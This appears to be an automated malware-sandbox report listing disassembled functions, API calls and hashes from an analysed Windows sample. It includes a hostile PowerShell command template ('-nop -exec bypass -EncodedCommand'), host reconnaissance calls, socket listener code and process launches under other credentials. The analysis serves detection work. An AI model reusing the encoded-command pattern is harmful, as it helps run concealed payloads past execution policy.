                        • Instruction ID: d626905942885ae7719f93b701446a829d444ed33c62021690dedd1acea0a88b
                        • Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                        • Instruction Fuzzy Hash: A031387231469496EB24DF61E8947BE6362FB84BA8F440135EF0A47798EF3CC65AC710
                        Function 00CF6B98 Relevance: 13.6, APIs: 9, Instructions: 72COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00CF6BE0: htonl.WS2_32 ref: 00CF6C3D
                          • Part of subcall function 00CF6BE0: select.WS2_32 ref: 00CF6CAB
                          • Part of subcall function 00CF6BE0: __WSAFDIsSet.WS2_32 ref: 00CF6CC3
                          • Part of subcall function 00CF6BE0: accept.WS2_32 ref: 00CF6CE0
                          • Part of subcall function 00CF6BE0: ioctlsocket.WS2_32 ref: 00CF6CF8
                          • Part of subcall function 00CF6BE0: __WSAFDIsSet.WS2_32 ref: 00CF6D9B
                        • GetTickCount.KERNEL32 ref: 00CF6BAA
                          • Part of subcall function 00CF6F2C: malloc.LIBCMT ref: 00CF6F5E
                          • Part of subcall function 00CF6F2C: htonl.WS2_32 ref: 00CF6F91
                          • Part of subcall function 00CF6F2C: recvfrom.WS2_32 ref: 00CF6FD5
                          • Part of subcall function 00CF6F2C: WSAGetLastError.WS2_32 ref: 00CF6FE2
                        • GetTickCount.KERNEL32 ref: 00CF6BC2
                        • GetTickCount.KERNEL32 ref: 00CF70E0
                        • GetTickCount.KERNEL32 ref: 00CF70F6
                        • shutdown.WS2_32 ref: 00CF7115
                        • shutdown.WS2_32 ref: 00CF712A
                        • closesocket.WS2_32 ref: 00CF7134
                        • free.LIBCMT ref: 00CF7154
                        • free.LIBCMT ref: 00CF7169
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                        • String ID:
                        • API String ID: 3610715900-0
                        • Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                        • Instruction ID: 1080c20038cb35faa41c071fb371d238f9ebd93b03b3991f51da40e3b3022d50
                        • Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                        • Instruction Fuzzy Hash: 9121A032204A49C2DBA09FA2E84437D2370FB48F98F188226CF5947218DF75C9A58713
                        Function 00D06434 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00D0645F
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • __doserrno.LIBCMT ref: 00D06457
                          • Part of subcall function 00D01CA8: _getptd_noexit.LIBCMT ref: 00D01CAC
                        • __lock_fhandle.LIBCMT ref: 00D064A3
                        • _unlock_fhandle.LIBCMT ref: 00D064DD
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
                        • String ID:
                        • API String ID: 2464146582-0
                        • Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                        • Instruction ID: 0ded6cc8c597b3455c857abea55a25717ee9779ccf9e874cae11be9dadb8988f
                        • Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                        • Instruction Fuzzy Hash: 3C113432B0864046E716AF69DD4133D7A61EB80BA2F5A4219EA2D0B3D2CB7CC891C735
                        Function 00A57008 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00A57033
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • __doserrno.LIBCMT ref: 00A5702B
                          • Part of subcall function 00A510A8: _getptd_noexit.LIBCMT ref: 00A510AC
                        • __lock_fhandle.LIBCMT ref: 00A57077
                        • _lseeki64_nolock.LIBCMT ref: 00A57090
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                        • String ID:
                        • API String ID: 4140391395-0
                        • Opcode ID: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                        • Instruction ID: 24869f5e2ced5ac64dda4e79e3574f09e8d9d298c5661dcf36be5b6aea1146e2
                        • Opcode Fuzzy Hash: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                        • Instruction Fuzzy Hash: BB11E43271465045EB026F25ED4233DBAA1B780BB3F598719EE392B3D5CB7C8489C721
                        Function 00A56E90 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00A56EBB
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • __doserrno.LIBCMT ref: 00A56EB3
                          • Part of subcall function 00A510A8: _getptd_noexit.LIBCMT ref: 00A510AC
                        • __lock_fhandle.LIBCMT ref: 00A56EFF
                        • _lseek_nolock.LIBCMT ref: 00A56F18
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                        • String ID:
                        • API String ID: 310312816-0
                        • Opcode ID: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                        • Instruction ID: 442e4f7fff8d8ef21560a802fcf992c23a57882ba40ccd5a181407ff39950d5c
                        • Opcode Fuzzy Hash: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                        • Instruction Fuzzy Hash: 3111E932B1064045E7156F65FE4133D7A61BB817A3F998219FE150B7D1CB78C84DC725
                        Function 00D0A73C Relevance: 13.6, APIs: 9, Instructions: 63COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                        • String ID:
                        • API String ID: 2927645455-0
                        • Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                        • Instruction ID: 1124d590b50ed6eb51e77b3b53cafa6dd88f3e2bada55602f225d985db64a71b
                        • Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                        • Instruction Fuzzy Hash: 2711043170074085D70AAFAD989537D6660EBC1B60F5D822DEB1E0B3D2CB78CC819776
                        Function 00D05C58 Relevance: 13.6, APIs: 9, Instructions: 57COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00D05C79
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • __doserrno.LIBCMT ref: 00D05C71
                          • Part of subcall function 00D01CA8: _getptd_noexit.LIBCMT ref: 00D01CAC
                        • __lock_fhandle.LIBCMT ref: 00D05CBD
                        • _close_nolock.LIBCMT ref: 00D05CD0
                        • _unlock_fhandle.LIBCMT ref: 00D05CE9
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
                        • String ID:
                        • API String ID: 2140805544-0
                        • Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                        • Instruction ID: 85241e1d8f8364f6d3ee1c0ddf4d46c29979b982b83eaf121402f382f3ca1da8
                        • Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                        • Instruction Fuzzy Hash: 1A112C36610B8046E3056F69FC8532E6751EB80761F695625DE1E073D6C678C8418B38
                        Function 00A4F36C Relevance: 12.6, APIs: 10, Instructions: 73COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno
                        • String ID:
                        • API String ID: 2288870239-0
                        • Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                        • Instruction ID: 8c94969ed53246c4cd76224494a75e79e99fc5f1e8cc0206fdb3ad647961121d
                        • Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                        • Instruction Fuzzy Hash: 52315E2A715B4085FF19EF11ED9532863A0BFE6BA4F1C9239CD1E0A660DF2CC4448306
                        Function 00401D50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 185COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                        • Address %p has no image-section, xrefs: 00401DC0
                        • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                        • Mingw-w64 runtime failure:, xrefs: 00401D88
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: QueryVirtual
                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                        • API String ID: 1804819252-1534286854
                        • Opcode ID: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                        • Instruction ID: 40df73200976b68941168ad0de7a995853c322167ef9a8bb8888d12721705d67
                        • Opcode Fuzzy Hash: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                        • Instruction Fuzzy Hash: ED51DDB2701B4092DB118F22E98475E77A0F799BE9F54823AEF58173E1EA3CC581C348
                        Function 00D0A348 Relevance: 12.1, APIs: 8, Instructions: 132COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _mtinitlocknum.LIBCMT ref: 00D0A375
                          • Part of subcall function 00D03E58: _FF_MSGBANNER.LIBCMT ref: 00D03E75
                          • Part of subcall function 00D03E58: _NMSG_WRITE.LIBCMT ref: 00D03E7F
                        • _lock.LIBCMT ref: 00D0A388
                        • _lock.LIBCMT ref: 00D0A3E3
                        • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00D0A3F8
                        • EnterCriticalSection.KERNEL32 ref: 00D0A414
                        • LeaveCriticalSection.KERNEL32 ref: 00D0A424
                        • _calloc_crt.LIBCMT ref: 00D0A49A
                        • __lock_fhandle.LIBCMT ref: 00D0A502
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$_lock$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                        • String ID:
                        • API String ID: 854778215-0
                        • Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                        • Instruction ID: 17a73f95e6c3af2d2e64be0cb4f258fe7064fd4c1610317dc9990aa5ada9d7e8
                        • Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                        • Instruction Fuzzy Hash: DD51163661078082DB20DF29D84832DB7A9FB94B58F19421ADE8E477E0DFB8C951C732
                        Function 00A55834 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00A5585F
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • __doserrno.LIBCMT ref: 00A55857
                          • Part of subcall function 00A510A8: _getptd_noexit.LIBCMT ref: 00A510AC
                        • __lock_fhandle.LIBCMT ref: 00A558A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                        • String ID:
                        • API String ID: 2611593033-0
                        • Opcode ID: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                        • Instruction ID: b19d6b682467631eb7fb2f72320e441ab8bb979c7b32ad3a8af2dac28c322962
                        • Opcode Fuzzy Hash: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                        • Instruction Fuzzy Hash: F9110632F14A8086D7016F76EE5133D7A60BB80BA3F594219EE251B3D2CB78C849D721
                        Function 00A55058 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00A55079
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • __doserrno.LIBCMT ref: 00A55071
                          • Part of subcall function 00A510A8: _getptd_noexit.LIBCMT ref: 00A510AC
                        • __lock_fhandle.LIBCMT ref: 00A550BD
                        • _close_nolock.LIBCMT ref: 00A550D0
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                        • String ID:
                        • API String ID: 4060740672-0
                        • Opcode ID: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                        • Instruction ID: 8d4196a13f9090bdf6bf6bd85bc76141a1fc3b011aae4e2275075dab77fc4416
                        • Opcode Fuzzy Hash: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                        • Instruction Fuzzy Hash: D2110A32B14E844AD7057F75EEA133D7A60BB817A3F594628DE1A073D2CB78C449C750
                        Function 00CE460C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00CE46A9
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • malloc.LIBCMT ref: 00CE46B3
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF318
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF31D
                        • malloc.LIBCMT ref: 00CE46BE
                        • free.LIBCMT ref: 00CE487E
                        • free.LIBCMT ref: 00CE4886
                        • free.LIBCMT ref: 00CE488E
                          • Part of subcall function 00CE54F0: malloc.LIBCMT ref: 00CE553A
                          • Part of subcall function 00CE54F0: malloc.LIBCMT ref: 00CE5545
                          • Part of subcall function 00CE54F0: free.LIBCMT ref: 00CE562C
                          • Part of subcall function 00CE54F0: free.LIBCMT ref: 00CE5634
                        • free.LIBCMT ref: 00CE489A
                        • free.LIBCMT ref: 00CE48A7
                        • free.LIBCMT ref: 00CE48B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$malloc$_errno$_callnewh$AllocHeap
                        • String ID:
                        • API String ID: 3534990644-0
                        • Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                        • Instruction ID: 4dbbf5242fa7d170c40167941c21135bf0a17d5bc717c29c60db988e0211a373
                        • Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                        • Instruction Fuzzy Hash: 1A6104267047C886DF29DF679490B6E7751FB85BC8F404129DE4A87B85DF38CA06DB01
                        Function 00A33A0C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00A33AA9
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • malloc.LIBCMT ref: 00A33AB3
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E718
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E71D
                        • malloc.LIBCMT ref: 00A33ABE
                        • free.LIBCMT ref: 00A33C7E
                        • free.LIBCMT ref: 00A33C86
                        • free.LIBCMT ref: 00A33C8E
                          • Part of subcall function 00A348F0: malloc.LIBCMT ref: 00A3493A
                          • Part of subcall function 00A348F0: malloc.LIBCMT ref: 00A34945
                          • Part of subcall function 00A348F0: free.LIBCMT ref: 00A34A2C
                          • Part of subcall function 00A348F0: free.LIBCMT ref: 00A34A34
                        • free.LIBCMT ref: 00A33C9A
                        • free.LIBCMT ref: 00A33CA7
                        • free.LIBCMT ref: 00A33CB4
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$malloc$_errno$_callnewh
                        • String ID:
                        • API String ID: 4160633307-0
                        • Opcode ID: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                        • Instruction ID: cd8d9c9905f1bbdf9de05d8f059fc6d778249188424f7d995bddffc492a2a97b
                        • Opcode Fuzzy Hash: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                        • Instruction Fuzzy Hash: 4B61E2633087854ADF25EF26944076ABBA1FB95FC8F055125EE4A57B05EF38CA0ACB04
                        Function 00A3BE74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 296COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00A453EC: malloc.LIBCMT ref: 00A45408
                        • malloc.LIBCMT ref: 00A3BF3B
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                          • Part of subcall function 00A4B630: _time64.LIBCMT ref: 00A4B654
                          • Part of subcall function 00A4B630: malloc.LIBCMT ref: 00A4B69C
                          • Part of subcall function 00A4B630: strtok.LIBCMT ref: 00A4B700
                          • Part of subcall function 00A4B630: strtok.LIBCMT ref: 00A4B711
                          • Part of subcall function 00A428A0: _time64.LIBCMT ref: 00A428AE
                          • Part of subcall function 00A4DEA8: malloc.LIBCMT ref: 00A4DEF8
                          • Part of subcall function 00A4DEA8: realloc.LIBCMT ref: 00A4DF07
                        • malloc.LIBCMT ref: 00A3C04A
                        • _snprintf.LIBCMT ref: 00A3C0C1
                        • _snprintf.LIBCMT ref: 00A3C0E7
                        • _snprintf.LIBCMT ref: 00A3C10E
                        • free.LIBCMT ref: 00A3C2C6
                          • Part of subcall function 00A4A144: malloc.LIBCMT ref: 00A4A178
                          • Part of subcall function 00A4A144: free.LIBCMT ref: 00A4A32F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
                        • String ID: /'); %s
                        • API String ID: 1314452303-1283008465
                        • Opcode ID: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                        • Instruction ID: 5e7449317982dc0819479dbbace587129f85368d9e7d90ec65bda18ef80d401e
                        • Opcode Fuzzy Hash: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                        • Instruction Fuzzy Hash: 71A1E32970178146DB14FBB2AA5676E7395FBD67D0F404124BE1A5B786DF3CC806C702
                        Function 00CFB47C Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 258COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00CF5FEC: malloc.LIBCMT ref: 00CF6008
                        • malloc.LIBCMT ref: 00CFB528
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                          • Part of subcall function 00CFEAA8: malloc.LIBCMT ref: 00CFEAF8
                        • GetComputerNameExA.KERNEL32 ref: 00CFB5EA
                        • GetComputerNameA.KERNEL32 ref: 00CFB61F
                        • GetUserNameA.ADVAPI32 ref: 00CFB654
                          • Part of subcall function 00CEF014: WSASocketA.WS2_32 ref: 00CEF042
                        • malloc.LIBCMT ref: 00CFB76D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                        • String ID: VUUU
                        • API String ID: 632458648-2040033107
                        • Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                        • Instruction ID: c7b7d9b7a5552d40ea19b1f3f1bd6819707135bbe0a885ab53d55776cbea5899
                        • Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                        • Instruction Fuzzy Hash: 2691262670069986DB84EB6AD8513BD2261FBC9BC4F908026EF495B756DF3CCE06D312
                        Function 00A3E004 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 165COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintf
                        • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                        • API String ID: 3512837008-1250630670
                        • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                        • Instruction ID: 9de1a824452a6af087b10af8f0c4376526e0f48e04b8c50bd17ce6c53c572c40
                        • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                        • Instruction Fuzzy Hash: 26718A36304B858AEB10DF61E9803E977B1F799B88F884626EA5D437A8DF3CC509C741
                        Function 00CF1478 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00CF5FEC: malloc.LIBCMT ref: 00CF6008
                        • GetStartupInfoA.KERNEL32 ref: 00CF1540
                          • Part of subcall function 00CEFE54: MultiByteToWideChar.KERNEL32 ref: 00CEFE81
                          • Part of subcall function 00CEFE54: MultiByteToWideChar.KERNEL32 ref: 00CEFEA9
                        • GetCurrentDirectoryW.KERNEL32 ref: 00CF15CD
                        • GetCurrentDirectoryW.KERNEL32 ref: 00CF15DC
                        • CreateProcessWithLogonW.ADVAPI32 ref: 00CF1637
                        • GetLastError.KERNEL32 ref: 00CF1641
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                        • String ID: %s as %s\%s: %d
                        • API String ID: 3435635427-816037529
                        • Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                        • Instruction ID: a2f506b8efdffa77f873e3e60696f10ee374d48fb40ce4d178d595009d7e6095
                        • Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                        • Instruction Fuzzy Hash: 33515832204B8186DB60DF16B8407AEB7A5F789B80F548129EF8D83B29DF38D056CB00
                        Function 00A40A94 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00A453EC: malloc.LIBCMT ref: 00A45408
                          • Part of subcall function 00A4FA20: _errno.LIBCMT ref: 00A4F977
                          • Part of subcall function 00A4FA20: _invalid_parameter_noinfo.LIBCMT ref: 00A4F982
                        • fseek.LIBCMT ref: 00A40B30
                          • Part of subcall function 00A502A4: _errno.LIBCMT ref: 00A502CC
                          • Part of subcall function 00A502A4: _invalid_parameter_noinfo.LIBCMT ref: 00A502D7
                        • _ftelli64.LIBCMT ref: 00A40B38
                          • Part of subcall function 00A50318: _errno.LIBCMT ref: 00A50336
                          • Part of subcall function 00A50318: _invalid_parameter_noinfo.LIBCMT ref: 00A50341
                        • fseek.LIBCMT ref: 00A40B48
                          • Part of subcall function 00A502A4: _fseek_nolock.LIBCMT ref: 00A502F5
                        • malloc.LIBCMT ref: 00A40B88
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
